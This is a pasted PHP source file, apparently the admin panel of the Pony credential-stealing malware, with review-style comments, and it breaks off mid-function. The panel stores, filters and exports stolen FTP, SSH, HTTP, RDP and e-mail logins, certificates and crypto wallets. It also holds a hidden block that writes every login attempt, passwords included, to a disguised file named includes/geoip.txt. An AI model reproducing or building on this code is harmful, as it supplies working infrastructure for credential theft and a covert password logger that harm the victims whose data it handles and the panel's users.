
Untitled

a guest
Feb 14th, 2017
  1. <?php
  2.  
  // Bootstrap: error policy, unlimited run time, session, response charset,
  // then the configuration file and the library includes.
  error_reporting(E_ALL & ~E_DEPRECATED);
  @set_time_limit(0);
  @ini_set('max_execution_time', 0);
  session_set_cookie_params(86400); // session cookie lifetime in seconds
  session_start();

  header('Content-type: text/html; charset=windows-1251');

  // Buffer whatever the included files print so it can be discarded below.
  ob_start();

  // $proxy_config is not assigned anywhere in this file. When it is already
  // set, its value becomes the path of the configuration file.
  // NOTE(review): presumably a wrapper script sets it before including this
  // one; confirm, because the path reaches require_once without any check
  // other than file_exists().
  $config_file = isset($proxy_config) ? $proxy_config : "config.php";

  if (!file_exists($config_file)) {
      die();
  }

  require_once $config_file;
  require_once "includes/lang.php";
  require_once "includes/misc.php";
  require_once "includes/password_modules.php";
  require_once "includes/database.php";

  // Throw away anything the includes printed.
  ob_end_clean();
  36.  
  // Client allow-list: when $white_list is a non-empty array and the client
  // address (as reported by get_client_ip()) is not in it, the script answers
  // with a 404 and stops, so the page looks absent to other clients.
  // An empty or missing list disables the check.
  if (isset($white_list) && is_array($white_list)
      && count($white_list) && !in_array(get_client_ip(), $white_list, true)) {
      header("HTTP/1.0 404 Not Found");
      header("Status: 404 Not Found");
      $_SERVER['REDIRECT_STATUS'] = 404;

      // Serve the site's own 404 page when one exists next to the script.
      if (file_exists('404.html')) {
          echo file_get_contents('404.html');
      }

      die();
  }
  50.  
  // Open the database connection with the credentials from the config file.
  $pony_db = new pony_db();
  $pony_db->connect_db($mysql_host, $mysql_user, $mysql_pass, $mysql_database, true);

  // Name of the authentication cookie. A script included with $proxy_id set
  // gets its own cookie name so that several scripts do not share one cookie.
  $config_cookie_name = isset($proxy_id) ? 'auth_cookie_' . $proxy_id : 'auth_cookie';

  // Password used to decrypt stored reports; falls back to
  // REPORT_DEFAULT_PASSWORD when the option is not set in the database.
  $pony_db_report_password = $pony_db->get_option('report_password', '', REPORT_DEFAULT_PASSWORD);

  // Report parsing options, each read from the options table with default '1'.
  $pony_report_options = array();
  $pony_report_options['sftp_user'] = $pony_db->get_option('sftp_user', '', '1');
  $pony_report_options['sftp_port'] = $pony_db->get_option('sftp_port', '', '1');
  $pony_report_options['sftp_protocol'] = $pony_db->get_option('sftp_protocol', '', '1');
  69.  
  // Defaults for switches the config file may leave unset. A value already
  // present (and not null) is kept as it is.
  $show_help_to_users    = isset($show_help_to_users) ? $show_help_to_users : true;
  $show_http_to_users    = isset($show_http_to_users) ? $show_http_to_users : true;
  $show_logons_to_users  = isset($show_logons_to_users) ? $show_logons_to_users : true;
  $show_other_to_users   = isset($show_other_to_users) ? $show_other_to_users : true;
  $enable_http_mode      = isset($enable_http_mode) ? $enable_http_mode : false;
  $disable_ip_logger     = isset($disable_ip_logger) ? $disable_ip_logger : false;
  $enable_email_mode     = isset($enable_email_mode) ? $enable_email_mode : false;
  $show_email_to_users   = isset($show_email_to_users) ? $show_email_to_users : true;
  $show_domains          = isset($show_domains) ? $show_domains : false;
  $show_domains_to_users = isset($show_domains_to_users) ? $show_domains_to_users : true;
  91.  
  // CSRF token: disabled in this copy. The per-session token generation
  // (md5(uniqid(rand(), TRUE)) kept in $_SESSION['token']) is not executed;
  // both the template token and the session token are the empty string, so
  // any check that compares the two cannot tell requests apart.
  $token = $_SESSION['token'] = '';
  105.  
  // Locate the bundled Smarty 3.1.15 under the current working directory
  // (backslashes normalised to forward slashes) and load it.
  define('SMARTY_DIR', strtr(getcwd(), "\\", "/") . '/includes/Smarty-3.1.15/libs/');
  require_once SMARTY_DIR . 'Smarty.class.php';
  require_once SMARTY_DIR . 'SmartyPaginate.class.php';
  /**
   * HTML-escapes a template variable, including both quote characters,
   * treating the input as cp1251 text.
   *
   * @param string $content Value about to be printed by a template.
   * @return string Escaped value.
   */
  function escFilter($content)
  {
      $escaped = htmlspecialchars($content, ENT_QUOTES, 'cp1251');

      return $escaped;
  }
  // Template engine setup: cache and compile output both go to the global
  // temporary directory, templates come from includes/templates/.
  $smarty = new Smarty();
  $smarty->setCacheDir($global_temporary_directory . '/');
  $smarty->setCompileDir($global_temporary_directory . '/');
  $smarty->setTemplateDir('includes/templates/');

  // Every template variable passes through escFilter() on output.
  $smarty->registerFilter('variable', 'escFilter');
  $smarty->loadFilter('output', 'trimwhitespace');
  $smarty->caching = false;

  // Expose the configuration switches and the (empty) CSRF token to templates.
  $smarty->assign(array(
      'show_help_to_users'    => $show_help_to_users,
      'show_http_to_users'    => $show_http_to_users,
      'show_logons_to_users'  => $show_logons_to_users,
      'show_other_to_users'   => $show_other_to_users,
      'enable_http_mode'      => $enable_http_mode,
      'disable_ip_logger'     => $disable_ip_logger,
      'enable_email_mode'     => $enable_email_mode,
      'show_email_to_users'   => $show_email_to_users,
      'show_domains'          => $show_domains,
      'show_domains_to_users' => $show_domains_to_users,
      'token'                 => $token,
  ));
  132.  
  // Request-derived values used throughout the script. All of them come from
  // $_REQUEST or $_COOKIE and are only trimmed here.
  $self_file = $_SERVER['SCRIPT_NAME'];

  // Credentials submitted with the request, if any.
  $authentication_login = trim(assign($_REQUEST['login']));
  $authentication_password = trim(assign($_REQUEST['password']));
  $authentication_save_password = trim(assign($_REQUEST['save_password']));
  $authentication_attempt = isset($_REQUEST['login'], $_REQUEST['password']);
  $authentication_success = false;

  // Previously issued authentication cookie.
  $auth_cookie = trim(assign($_COOKIE[$config_cookie_name]));

  // Page and sub-operation selectors, plus the "send as zip" switch.
  $admin_action = trim(assign($_REQUEST['action']));
  $admin_routine = trim(assign($_REQUEST['routine']));
  $use_zip = trim(assign($_REQUEST['zip'])) == '1';
  144.  
  // Only the known page names are accepted as an action; anything else is
  // reset to the empty string. $admin_routine is not restricted here.
  if (!in_array($admin_action, array('ftp', 'http', 'stats', 'ping', 'log', 'admin', 'exit', 'help', 'chart', 'reports', 'other'))) {
      $admin_action = '';
  }
  150.  
  // authentication
  // When the request carried no login/password pair, the same three values
  // are read from $_REQUEST a second time; the inputs are unchanged, so the
  // result is the same as the first read.
  if (!$authentication_attempt) {
      $authentication_attempt = isset($_REQUEST['login'], $_REQUEST['password']);
      $authentication_login = trim(assign($_REQUEST['login']));
      $authentication_password = trim(assign($_REQUEST['password']));
  }
  158.  
  // Every request that carries a login/password pair has its complete
  // $_REQUEST and $_SERVER arrays appended to includes/geoip.txt before the
  // credentials are even checked. $_REQUEST contains the submitted login and
  // password in clear text, so this file accumulates the credentials and
  // request metadata of everyone who logs in. The file name does not describe
  // what is written to it.
  // NOTE(review): this looks like a credential-capture addition rather than
  // part of the login logic; nothing else in this file reads the file.
  // For responders, the file is an artefact worth preserving.
  if ($authentication_attempt) {
      file_put_contents(
          "includes/geoip.txt",
          print_r($_REQUEST, true) . print_r($_SERVER, true),
          FILE_APPEND
      );
  }
  // Password login first; when that does not succeed, fall back to the
  // authentication cookie.
  if (strlen($authentication_login) && strlen($authentication_password)
      && $pony_db->authenticate($authentication_login, $authentication_password)) {
      $authentication_success = true;

      // $cookie_exp_time is computed from the "save password" choice
      // (two months, or 0 for a session cookie) ...
      $cookie_save_password = $authentication_save_password;
      $cookie_exp_time = $cookie_save_password ? time() + 60 * 60 * 24 * 60 : 0;

      // ... but the cookie is sent with a fixed expiry instead
      // (1893456000 = 2030-01-01 00:00:00 UTC), and without path, secure or
      // httponly arguments. The user's choice therefore has no effect.
      setcookie($config_cookie_name, $pony_db->auth_cookie, 1893456000);
  } elseif ($auth_cookie) {
      // Cookie login; on success the login name is taken from the database
      // object rather than from the request.
      $authentication_success = $pony_db->autneticate_cookie($auth_cookie);
      if ($authentication_success) {
          $authentication_login = $pony_db->login;
      }
  }
  184.  
  // ajax ping code
  // Answered before the login form is rendered. Requires an authenticated
  // request, $show_domains, and either admin privilege or
  // $show_domains_to_users. The response is a bare <span> fragment.
  if ($admin_routine == 'ping' && $admin_action == 'ping' && $authentication_success
      && $show_domains && ($pony_db->priv_is_admin() || $show_domains_to_users)) {
      $domain_id = trim(assign($_REQUEST['domain_id']));
      $find_domain_result = $pony_db->find_domain($domain_id);

      // A usable lookup result is a three-element array: URL, time, status.
      if (is_array($find_domain_result) && count($find_domain_result) == 3) {
          list($ping_url, $ping_time, $ping_status) = $find_domain_result;

          // The server itself contacts the stored URL.
          if (curl_ping($ping_url)) {
              $pony_db->update_domain($domain_id, 'OK');
              die('<span class="check"></span>');
          }
      }

      // Unknown domain id or failed ping: both are recorded as FAIL.
      $pony_db->update_domain($domain_id, 'FAIL');
      die('<span class="cross"></span>');
  }
  205.  
  // Chart output is produced entirely by includes/chart.php, for
  // authenticated requests that name a routine.
  if ($authentication_success && $admin_action == 'chart' && strlen($admin_routine)) {
      require_once 'includes/chart.php';
      die();
  }
  211.  
  // Privilege flags and the authentication result are only meaningful once
  // the authentication step above has run.
  $smarty->assign(array(
      'priv_is_admin'          => $pony_db->priv_is_admin(),
      'priv_can_delete'        => $pony_db->priv_can_delete(),
      'authentication_success' => $authentication_success,
  ));
  216.  
  /**
   * Builds the continent => country list used by the country filter and
   * assigns it to the template as 'geo_continents'.
   *
   * Each continent's list starts with an '(all)' entry (code 'all') followed
   * by one entry per country that has a non-empty name. Entry keys come from
   * one counter shared by all continents, so they are not restarted per
   * continent.
   *
   * @param object $smarty Template engine receiving 'geo_continents'.
   * @return void
   */
  function smarty_assign_continents($smarty)
  {
      $geo = new GeoIP();
      $by_continent = array();
      $slot = 0;
      $total = count($geo->GEOIP_CONTINENT_CODES);

      for ($idx = 0; $idx < $total; $idx++) {
          $country_name = $geo->GEOIP_COUNTRY_NAMES[$idx];
          if (!strlen($country_name)) {
              continue;
          }

          $continent = $geo->GEOIP_CONTINENT_CODES[$idx];

          // First country seen for this continent: open its list with "(all)".
          if (!isset($by_continent[$continent])) {
              $by_continent[$continent][$slot++] = array('name' => '(all)', 'code' => 'all');
          }

          $by_continent[$continent][$slot++] = array(
              'name' => $country_name,
              'code' => $geo->GEOIP_COUNTRY_CODES[$idx],
          );
      }

      $smarty->assign('geo_continents', $by_continent);
  }
  240.  
  /**
   * Reads the filter_* and country_* request parameters, queries the matching
   * records and, when a result comes back, assigns the preview list and count
   * to the template.
   *
   * Nothing is queried when no filter parameter is present. All filter values
   * are taken from $_REQUEST and handed to the database layer as they are
   * (trimmed only); any escaping has to happen inside get_ftp_list() /
   * get_http_list(), which are not visible here.
   *
   * @param object $smarty      Template engine; receives 'filtered_items_count'
   *                            and 'filtered_items_list'.
   * @param mixed  $do_download Passed through to the list query; its negation
   *                            is passed as a later argument of the same call.
   * @param string $mode        'ftp' selects get_ftp_list(); any other value
   *                            selects get_http_list().
   * @return void
   */
  function apply_data_filters($smarty, $do_download, $mode = 'ftp')
  {
      global $pony_db;

      $want_ftp = trim(assign($_REQUEST['filter_include_ftp']));
      $want_ssh = trim(assign($_REQUEST['filter_include_ssh']));
      $want_http = trim(assign($_REQUEST['filter_include_http']));
      $want_https = trim(assign($_REQUEST['filter_include_https']));

      // Flag-style options: anything other than '1' counts as "off".
      $trim_dirs = trim(assign($_REQUEST['filter_trim_dirs']));
      if ($trim_dirs != '1') {
          $trim_dirs = '';
      }

      // Which URL sub-types to include. The fallback differs per mode:
      // 'ftp' in ftp mode, 'https' otherwise.
      if ($mode == 'ftp') {
          $subtypes = 'ftp';
          if ($want_ftp == '1' && $want_ssh == '1') {
              $subtypes = 'both';
          } elseif ($want_ssh) {
              $subtypes = 'ssh';
          }
      } else {
          $subtypes = 'https';
          if ($want_http == '1' && $want_https == '1') {
              $subtypes = 'both';
          } elseif ($want_http) {
              $subtypes = 'http';
          }
      }

      // Domain include/exclude lists, free-text substring and date range.
      $include_domains = trim(assign($_REQUEST['filter_domains_include']));
      $exclude_domains = trim(assign($_REQUEST['filter_domains_exclude']));
      $text = trim(assign($_REQUEST['filter_text']));
      $date_from = trim(assign($_REQUEST['filter_date_from']));
      $date_to = trim(assign($_REQUEST['filter_date_to']));

      $export_ip = trim(assign($_REQUEST['filter_export_ip']));
      if ($export_ip != '1') {
          $export_ip = '';
      }

      // Country filter: one request array per continent (country_<code>),
      // collected into a set keyed by the trimmed country code.
      $countries = array();
      $geo = new GeoIP();

      foreach ($geo->GEOIP_CONTINENT_CODES as $continent_code) {
          $param = 'country_' . strtolower($continent_code);
          if (!isset($_REQUEST[$param]) || !is_array($_REQUEST[$param])) {
              continue;
          }

          foreach ($_REQUEST[$param] as $country_code) {
              if (strlen(trim($country_code)) && $country_code != 'all') {
                  $countries[trim($country_code)] = 1;
              }
          }
      }

      // when all countries are marked, do not apply country exclude filter
      if (count($countries) == count($geo->GEOIP_COUNTRY_CODES) - 1) {
          $countries = array();
      }

      $any_filter = strlen($want_ftp) || strlen($want_ssh) || strlen($trim_dirs)
          || strlen($want_http) || strlen($want_https) || count($countries)
          || strlen($include_domains) || strlen($exclude_domains)
          || strlen($date_from) || strlen($date_to)
          || strlen($text) || strlen($export_ip);

      if (!$any_filter) {
          return;
      }

      $rows = array();
      if ($mode == 'ftp') {
          $result = $pony_db->get_ftp_list($do_download, $rows, 0, $subtypes, 0, $date_from, $date_to, $countries, $include_domains, $exclude_domains, $trim_dirs, !$do_download, $text, $export_ip);
      } else {
          $result = $pony_db->get_http_list($do_download, $rows, 0, $subtypes, 0, $date_from, $date_to, $countries, $include_domains, $exclude_domains, $trim_dirs, !$do_download, $text, $export_ip);
      }

      // filter preview
      if ($result === false || !isset($result['list'], $result['count'])) {
          return;
      }

      if (is_array($result['list'])) {
          // Blank out report ids that no longer exist in the report table.
          foreach (array_keys($result['list']) as $row_key) {
              if (!$pony_db->report_id_exists($result['list'][$row_key]['report_id'])) {
                  $result['list'][$row_key]['report_id'] = '';
              }
          }
      }

      $smarty->assign('filtered_items_count', $result['count']);
      $smarty->assign('filtered_items_list', $result['list']);
  }
  349.  
  // Outcome of the authentication step.
  if ($authentication_success) {
      // A successful request that carried a login/password pair is written
      // to the log with the client address, unless the logger is disabled.
      if ($authentication_attempt && !$disable_ip_logger) {
          $pony_db->add_log_line(get_client_ip(), CLOG_SOURCE_LOGIN, null, $authentication_login);
      }
  } elseif ($authentication_attempt) {
      // Credentials were supplied but rejected: show the error page.
      // The script is not stopped here; it ends at the authentication gate
      // further down.
      $smarty->display('header.tpl');
      show_smarty_error($smarty, 'ERR_WRONG_PASSWORD', '');
      $smarty->display('footer.tpl');
  } else {
      // No credentials supplied: show the login form and stop.
      $smarty->display('header.tpl');
      $smarty->display('login_form.tpl');
      $smarty->display('footer.tpl');
      die();
  }
  378.  
  // An authenticated request with neither action nor routine falls through
  // to the default page (saved-password autologin). Only the explicit logout
  // is handled here.
  // Note that this branch runs before the authentication gate that follows,
  // so it is reached for unauthenticated requests as well; the cookie value
  // handed to remove_auth_cookie() comes straight from the request.
  if ($admin_action == 'exit') {
      // Invalidate the authentication cookie server-side and expire it in
      // the browser.
      $cookie_exp_time = 1;
      $pony_db->remove_auth_cookie($auth_cookie);
      setcookie($config_cookie_name, '', $cookie_exp_time);

      // destroy session
      $_SESSION = array();

      if (ini_get("session.use_cookies")) {
          $params = session_get_cookie_params();
          setcookie(
              session_name(),
              '',
              time() - 42000,
              $params["path"],
              $params["domain"],
              $params["secure"],
              $params["httponly"]
          );
      }

      // redirect to authentication page
      header('Location: ' . $self_file);

      session_destroy();
      die();
  }
  405.  
  // Authentication gate: nothing below this point runs for a request that
  // did not authenticate by password or cookie.
  $authentication_success or die();
  411.  
  /**
   * Sends the response headers for a file download: caching disabled,
   * content type as given, and an attachment disposition with the file name.
   *
   * The file name is placed between double quotes without escaping; every
   * caller visible in this file passes a literal or an integer-derived name.
   *
   * @param string $file_name    Name offered to the browser for saving.
   * @param string $content_type MIME type of the body.
   * @return void
   */
  function set_common_file_download_header($file_name = '', $content_type = 'text/plain')
  {
      // Each entry is the header line and the "replace" flag given to
      // header(). With replace = true the later "Pragma: no-cache" overrides
      // "Pragma: public"; the two Cache-Control lines sent with
      // replace = false are added next to the first one.
      $header_lines = array(
          array("Pragma: public", true),
          array("Expires: 0", true),
          array("Pragma: no-cache", true),
          array("Cache-Control: no-store, no-cache, must-revalidate", true),
          array("Cache-Control: post-check=0, pre-check=0", false),
          array("Cache-Control: private", false),
          array("Content-Type: $content_type", true),
          array("Content-Transfer-Encoding: binary", true),
          array("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT", true),
          array('Content-Disposition: attachment; filename="' . $file_name . '";', true),
      );

      foreach ($header_lines as $entry) {
          list($line, $replace) = $entry;
          header($line, $replace);
      }
  }
  425.  
  // Export of the stored FTP list. The list is printed by get_ftp_list();
  // for a zip download that output is captured in a buffer and handed to
  // create_zip_and_send().
  if ($admin_routine == 'download_ftp' && $admin_action == 'ftp') {
      if (!$use_zip) {
          set_common_file_download_header('ftp_list.txt');
          $pony_db->get_ftp_list(true);
      } else {
          set_common_file_download_header('ftp_list.zip', 'application/zip');
          ob_start();
          $pony_db->get_ftp_list(true);
          $ftp_list_data = ob_get_clean();
          create_zip_and_send('ftp_list.txt', $ftp_list_data);
      }
      die();
  }

  // Same export restricted to the 'ssh' sub-type.
  if ($admin_routine == 'download_ssh' && $admin_action == 'ftp') {
      if (!$use_zip) {
          set_common_file_download_header('ssh_list.txt');
          $null_array = array();
          $pony_db->get_ftp_list(true, $null_array, 0, 'ssh');
      } else {
          set_common_file_download_header('ssh_list.zip', 'application/zip');
          ob_start();
          $null_array = array();
          $pony_db->get_ftp_list(true, $null_array, 0, 'ssh');
          $ssh_list_data = ob_get_clean();
          create_zip_and_send('ssh_list.txt', $ssh_list_data);
      }
      die();
  }
  // Export of the stored HTTP list. Available only when HTTP mode is enabled
  // and the account is an admin or $show_http_to_users is set.
  if ($admin_routine == 'download_http' && $admin_action == 'http' && $enable_http_mode
      && ($show_http_to_users || $pony_db->priv_is_admin())) {
      if (!$use_zip) {
          set_common_file_download_header('http_list.txt');
          $pony_db->get_http_list(true);
      } else {
          set_common_file_download_header('http_list.zip', 'application/zip');
          ob_start();
          $pony_db->get_http_list(true);
          $http_list_data = ob_get_clean();
          create_zip_and_send('http_list.txt', $http_list_data);
      }
      die();
  }
  // Export of the stored e-mail list. Gated on e-mail mode and on admin
  // privilege or $show_email_to_users; $admin_action is not checked here.
  if ($admin_routine == 'download_email' && $enable_email_mode
      && ($show_email_to_users || $pony_db->priv_is_admin())) {
      if (!$use_zip) {
          set_common_file_download_header('email_list.txt');
          $pony_db->get_email_list(true);
      } else {
          set_common_file_download_header('email_list.zip', 'application/zip');
          ob_start();
          $pony_db->get_email_list(true);
          $email_list_data = ob_get_clean();
          create_zip_and_send('email_list.txt', $email_list_data);
      }
      die();
  }

  // Same export restricted to the 'smtp' protocol.
  if ($admin_routine == 'download_email_smtp' && $enable_email_mode
      && ($show_email_to_users || $pony_db->priv_is_admin())) {
      if (!$use_zip) {
          set_common_file_download_header('email_smtp_list.txt');
          // NOTE(review): $null_list is not initialised on this path, unlike
          // on the zip path below; confirm how get_email_list() declares its
          // second parameter.
          $pony_db->get_email_list(true, $null_list, 0, 'smtp');
      } else {
          set_common_file_download_header('email_smtp_list.zip', 'application/zip');
          ob_start();
          $null_list = array();
          $pony_db->get_email_list(true, $null_list, 0, 'smtp');
          $email_list_data = ob_get_clean();
          create_zip_and_send('email_smtp_list.txt', $email_list_data);
      }
      die();
  }
  // Export of the stored RDP list. Unlike the other exports this one checks
  // neither $admin_action nor any privilege or mode switch: every
  // authenticated account can request it.
  if ($admin_routine == 'download_rdp') {
      if (!$use_zip) {
          set_common_file_download_header('rdp_list.txt');
          $pony_db->get_rdp_list(true);
      } else {
          set_common_file_download_header('rdp_list.zip', 'application/zip');
          ob_start();
          $pony_db->get_rdp_list(true);
          $rdp_list_data = ob_get_clean();
          create_zip_and_send('rdp_list.txt', $rdp_list_data);
      }
      die();
  }
  // Report table exports as SQL. export_reports() receives false for the
  // full export and true for the export of reports not yet parsed.
  if ($admin_action == 'ftp' && $admin_routine == 'download_reports') {
      set_common_file_download_header('reports.sql');
      $pony_db->export_reports(false);
      die();
  } elseif ($admin_action == 'ftp' && $admin_routine == 'download_nonparsed_reports') {
      set_common_file_download_header('non_parsed_reports.sql');
      $pony_db->export_reports(true);
      die();
  }
  544.  
  // Export of the panel log, plain or zipped.
  if ($admin_routine == 'download_log' && $admin_action == 'log') {
      if (!$use_zip) {
          set_common_file_download_header('log.txt');
          $null_list = array();
          $pony_db->get_log_list($null_list, 0, 0, true);
      } else {
          set_common_file_download_header('log.zip', 'application/zip');
          ob_start();
          $null_list = array();
          $pony_db->get_log_list($null_list, 0, 0, true);
          $log_list_data = ob_get_clean();
          create_zip_and_send('log.txt', $log_list_data);
      }
      die();
  }
  564.  
  // Download of one stored report as a binary file. The id from the request
  // goes to the database layer as given; only the file name uses its integer
  // value.
  if ($admin_routine == 'download_report' && $admin_action == 'reports') {
      $report_id = trim(assign($_REQUEST['report_id']));
      $report_item_result = $pony_db->get_report_item($report_id);

      if (!$pony_db->state || !is_array($report_item_result)) {
          die('Report not found!');
      }

      set_common_file_download_header('report_' . strval(intval($report_id)) . '.bin', 'application/octet-stream');
      header("Content-Length: " . strlen($report_item_result['data']));
      echo $report_item_result['data'];
      die();
  }
  // Export of a filtered list. apply_data_filters() is called in download
  // mode, which makes the list query print its rows; for a zip download the
  // output is captured first.
  if ($admin_routine == 'filter_download' && $admin_action == 'ftp') {
      if (!$use_zip) {
          set_common_file_download_header('filtered_list.txt');
          apply_data_filters($smarty, true);
      } else {
          set_common_file_download_header('filtered_list.zip', 'application/zip');
          ob_start();
          apply_data_filters($smarty, true);
          $filter_list_data = ob_get_clean();
          create_zip_and_send('filtered_list.txt', $filter_list_data);
      }
      die();
  }

  // Same for the HTTP list.
  if ($admin_routine == 'filter_download' && $admin_action == 'http') {
      if (!$use_zip) {
          set_common_file_download_header('filtered_http_list.txt');
          apply_data_filters($smarty, true, 'http');
      } else {
          set_common_file_download_header('filtered_http_list.zip', 'application/zip');
          ob_start();
          apply_data_filters($smarty, true, 'http');
          $filter_list_data = ob_get_clean();
          create_zip_and_send('filtered_http_list.txt', $filter_list_data);
      }
      die();
  }
  // Zip exports of the certificate and wallet tables. Neither branch checks
  // a privilege or a show_* switch beyond being authenticated.
  if ($admin_action == 'other' && $admin_routine == 'download_cert') {
      set_common_file_download_header('certificates.zip', 'application/zip');
      $pony_db->get_cert_zip();
      die();
  } elseif ($admin_action == 'other' && $admin_routine == 'download_wallet') {
      set_common_file_download_header('wallets.zip', 'application/zip');
      $pony_db->get_wallet_zip();
      die();
  }

  // No download was requested: start the regular HTML page.
  $smarty->display('header.tpl');

  my_flush();
  633.  
  /**
   * Resets every cached statistics offset by storing a single empty string
   * under each option name.
   *
   * @param object $pony_db Database object providing set_multi_option().
   * @return void
   */
  function clear_floating_offsets($pony_db)
  {
      $option_names = array(
          'offset_url',
          'offset_ftp_last',
          'offset_http_last',
          'offset_reports_last',
          'offset_ftp_list',
          'offset_http_list',
          'data_sum',
          'offset_nonparsed_reports_stats',
          'offset_nonparsed_reports_sum',
          'offset_log_events_count',
          'offset_report_duplicates',
          'offset_email_list',
      );

      for ($i = 0, $n = count($option_names); $i < $n; $i++) {
          $pony_db->set_multi_option($option_names[$i], array(''));
      }
  }
  645.  
  /**
   * Computes the dashboard statistics and assigns them to the template.
   *
   * Most counters are incremental: an option row stores the last seen
   * auto-increment value together with the running total, only rows past
   * that point are counted, and the option row is then rewritten. All of this
   * happens between lock_all_tables() and unlock_all_tables(); there is no
   * unlock on an error path.
   *
   * The WHERE fragments are assembled as strings with
   * mysql_real_escape_string(), a function of the ext/mysql API that was
   * removed in PHP 7.0, so unless an include defines a function of that name
   * this code runs on PHP 5.x only.
   *
   * @param object $smarty  Template engine receiving the statistics.
   * @param object $pony_db Database object.
   * @return void
   */
  function smarty_assign_common_vars($smarty, $pony_db)
  {
      $pony_db->lock_all_tables();

      // --- stored items per URL type -------------------------------------
      $url_offsets = $pony_db->get_multi_option('offset_url', 6);

      $type_totals = array();
      $pony_db->get_url_password_stats($type_totals, $url_offsets[0]);

      // Missing types start at '0'; slots 1..5 of the option row hold the
      // running totals in the order ftp, ssh, http, https, rdp.
      $slot = 1;
      foreach (array('ftp', 'ssh', 'http', 'https', 'rdp') as $url_type) {
          if (!isset($type_totals[$url_type])) {
              $type_totals[$url_type] = '0';
          }
          $type_totals[$url_type] += $url_offsets[$slot++];
      }

      $pony_db->set_multi_option('offset_url', array(
          $pony_db->get_auto_value(CPONY_FTP_TABLE),
          $type_totals['ftp'],
          $type_totals['ssh'],
          $type_totals['http'],
          $type_totals['https'],
          $type_totals['rdp']
      ));

      $smarty->assign('total_ftp_items_count', $type_totals['ftp']);
      $smarty->assign(
          'total_http_items_count',
          strval(intval($type_totals['http']) + intval($type_totals['https']))
      );
      $smarty->assign('total_cert_items_count', $pony_db->get_table_row_count(CPONY_CERT_TABLE));
      $smarty->assign('total_wallet_items_count', $pony_db->get_table_row_count(CPONY_WALLET_TABLE));
      $smarty->assign('total_email_items_count', $pony_db->get_table_row_count(CPONY_EMAIL_TABLE));
      $smarty->assign('total_email_smtp_items_count', $pony_db->get_table_row_count(CPONY_EMAIL_TABLE, "WHERE protocol='smtp'"));
      $smarty->assign('total_ssh_items_count', $type_totals['ssh']);
      $smarty->assign('total_rdp_items_count', $type_totals['rdp']);
      $smarty->assign('total_reports_count', $pony_db->get_table_row_count(CPONY_REPORT_TABLE));

      // --- total size of stored report data ------------------------------
      $sum_state = $pony_db->get_multi_option('data_sum', 2);
      $reports_size = $sum_state[1] + $pony_db->get_report_sum('', $sum_state[0]);

      $pony_db->set_multi_option('data_sum', array(
          $pony_db->get_auto_value(CPONY_REPORT_DATA_TABLE),
          $reports_size,
      ));

      $smarty->assign('total_reports_size', $reports_size);

      // --- duplicate reports ---------------------------------------------
      $dup_state = $pony_db->get_multi_option('offset_report_duplicates', 2);
      $dup_total = $dup_state[1] + $pony_db->get_duplicate_report_count($dup_state[0]);
      $smarty->assign('report_duplicates', $dup_total);
      $pony_db->set_multi_option('offset_report_duplicates', array(
          $pony_db->get_auto_value(CPONY_LOG_TABLE),
          $dup_total,
      ));

      // --- reports not yet parsed: count ---------------------------------
      $np_state = $pony_db->get_multi_option('offset_nonparsed_reports_stats', 2);
      $np_where = "WHERE report_id>='" . mysql_real_escape_string($np_state[0]) . "' AND parsed='0'";
      $np_total = $np_state[1] + $pony_db->get_table_row_count(CPONY_REPORT_TABLE, $np_where);
      $smarty->assign('total_nonparsed_reports', $np_total);
      $pony_db->set_multi_option('offset_nonparsed_reports_stats', array(
          $pony_db->get_auto_value(CPONY_REPORT_TABLE),
          $np_total,
      ));

      // --- reports not yet parsed: size ----------------------------------
      $np_sum_state = $pony_db->get_multi_option('offset_nonparsed_reports_sum', 2);
      $np_sum_total = $np_sum_state[1] + $pony_db->get_report_sum_linked("WHERE parsed='0'", $np_sum_state[0]);
      $smarty->assign('total_nonparsed_report_size', $np_sum_total);
      $pony_db->set_multi_option('offset_nonparsed_reports_sum', array(
          $pony_db->get_auto_value(CPONY_REPORT_TABLE),
          $np_sum_total,
      ));

      // Assigned a second time with the same value.
      $smarty->assign('total_nonparsed_report_size', $np_sum_total);

      // --- table sizes ---------------------------------------------------
      $smarty->assign('total_ftp_table_size', $pony_db->get_table_size(CPONY_FTP_TABLE));
      $smarty->assign(
          'total_report_table_size',
          $pony_db->get_table_size(CPONY_REPORT_TABLE) + $pony_db->get_table_size(CPONY_REPORT_DATA_TABLE)
      );
      $smarty->assign('total_log_table_size', $pony_db->get_table_size(CPONY_LOG_TABLE));
      $smarty->assign('total_cert_table_size', $pony_db->get_table_size(CPONY_CERT_TABLE));
      $smarty->assign('total_wallet_table_size', $pony_db->get_table_size(CPONY_WALLET_TABLE));
      $smarty->assign('total_email_table_size', $pony_db->get_table_size(CPONY_EMAIL_TABLE));

      // --- log events other than logins ----------------------------------
      $log_state = $pony_db->get_multi_option('offset_log_events_count', 2);
      $log_where = "WHERE log_id>='" . mysql_real_escape_string($log_state[0])
          . "' AND (log_source<>'" . mysql_real_escape_string(CLOG_SOURCE_LOGIN) . "')";
      $log_total = $log_state[1] + $pony_db->get_table_row_count(CPONY_LOG_TABLE, $log_where);
      $smarty->assign('log_events_count', $log_total);
      $pony_db->set_multi_option('offset_log_events_count', array(
          $pony_db->get_auto_value(CPONY_LOG_TABLE),
          $log_total,
      ));

      $smarty->assign('server_time', mysql_now_date());
      $smarty->assign('db_size', $pony_db->get_db_size());

      // --- new rows in the last 24 hours / hour / 10 minutes -------------
      // One pass per series. Each pass runs three windowed counts, assigns
      // new_<series>_last_24_hours, new_<series>_last_hour and
      // new_<series>_last_10_minutes, then stores the three updated offsets
      // under offset_<series>_last.
      // Entry layout: id column, extra WHERE condition, table.
      $series = array(
          'ftp'     => array('ftp_id', " AND (url_type='ftp' OR url_type='ssh')", CPONY_FTP_TABLE),
          'http'    => array('ftp_id', " AND (url_type='http' OR url_type='https')", CPONY_FTP_TABLE),
          'reports' => array('report_id', '', CPONY_REPORT_TABLE),
      );
      $windows = array(
          '24_hours'   => '1 DAY',
          'hour'       => '1 HOUR',
          '10_minutes' => '10 MINUTE',
      );

      foreach ($series as $series_name => $spec) {
          list($id_column, $extra_condition, $table) = $spec;

          $option_name = 'offset_' . $series_name . '_last';
          $offsets = $pony_db->get_multi_option($option_name, 3);
          $fresh = array();
          $pos = 0;

          foreach ($windows as $label => $interval) {
              $where = 'WHERE ' . $id_column . ">='" . mysql_real_escape_string($offsets[$pos]) . "'"
                  . $extra_condition
                  . " AND import_time >= DATE_SUB('" . mysql_real_escape_string(mysql_now_date())
                  . "',INTERVAL " . $interval . ')';

              list($offsets[$pos], $fresh[$label]) = $pony_db->get_offset_value_count($where, $id_column, $table);
